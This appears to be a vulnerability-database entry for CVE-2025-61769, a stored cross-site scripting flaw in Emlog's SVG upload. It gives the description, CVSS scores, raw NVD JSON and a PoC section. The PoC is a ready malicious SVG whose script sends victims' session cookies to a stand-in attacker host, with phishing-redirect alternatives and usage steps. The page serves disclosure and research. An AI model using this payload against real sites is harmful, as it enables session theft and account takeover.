Security Vulnerability Report
中文
CVE-2025-61769 CVSS 6.1 MEDIUM

CVE-2025-61769

Published: 2025-10-06 17:16:08
Last Modified: 2025-10-09 16:48:42
Source: [email protected]

Description

Emlog is an open source website building system. A cross-site scripting (XSS) vulnerability in emlog up to and including version 2.5.22 allows authenticated remote attackers to inject arbitrary web script or HTML via the file upload functionality. As an authenticated user it is possible to upload .svg file that contains JavaScript code that is later being executed. Commit 052f9c4226b2c0014bcd857fec47677340b185b1 fixes the issue.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:emlog:emlog:*:*:*:*:pro:*:*:* - VULNERABLE
Emlog <= 2.5.22

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-61769 PoC: Malicious SVG file for XSS via file upload in Emlog --> <!-- Save the following content as malicious.svg and upload via Emlog's file upload feature --> <?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" width="200" height="200"> <script type="text/javascript"> // XSS payload - steal session cookies var cookie = document.cookie; var img = new Image(); img.src = "http://attacker-server.com/steal?cookie=" + encodeURIComponent(cookie); // Alternative: redirect to phishing page // window.location = "http://attacker-server.com/phishing"; // Alternative: perform actions as the victim user // fetch('/admin/action', {method: 'POST', body: 'malicious=data'}); </script> <rect x="0" y="0" width="200" height="200" fill="red"/> <text x="50" y="100" fill="white">Malicious SVG</text> </svg> <!-- Alternative simpler PoC using SVG event handler: <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"> <circle cx="100" cy="100" r="50"/> </svg> Usage: 1. Login to Emlog as any authenticated user 2. Upload this malicious.svg file via the file upload functionality 3. Share the URL of the uploaded SVG with victim users 4. When the SVG is rendered in the browser, the JavaScript executes -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61769", "sourceIdentifier": "[email protected]", "published": "2025-10-06T17:16:07.950", "lastModified": "2025-10-09T16:48:42.397", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Emlog is an open source website building system. A cross-site scripting (XSS) vulnerability in emlog up to and including version 2.5.22 allows authenticated remote attackers to inject arbitrary web script or HTML via the file upload functionality. As an authenticated user it is possible to upload .svg file that contains JavaScript code that is later being executed. Commit 052f9c4226b2c0014bcd857fec47677340b185b1 fixes the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:emlog:emlog:*:*:*:*:pro:*:*:*", "versionEndExcluding": "2.5.22", "matchCriteriaId": "BE0C705A-0E18-4783-A8D4-AD3F08F3B635"}]}]}], "references": [{"url": "https://github.com/emlog/emlog/commit/052f9c4226b2c0014bcd857fec47677340b185b1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/emlog/emlog/security/advisories/GHSA-rrf5-pv68-gpjf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/emlog/emlog/security/advisories/GHSA-rrf5-pv68-gpjf", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.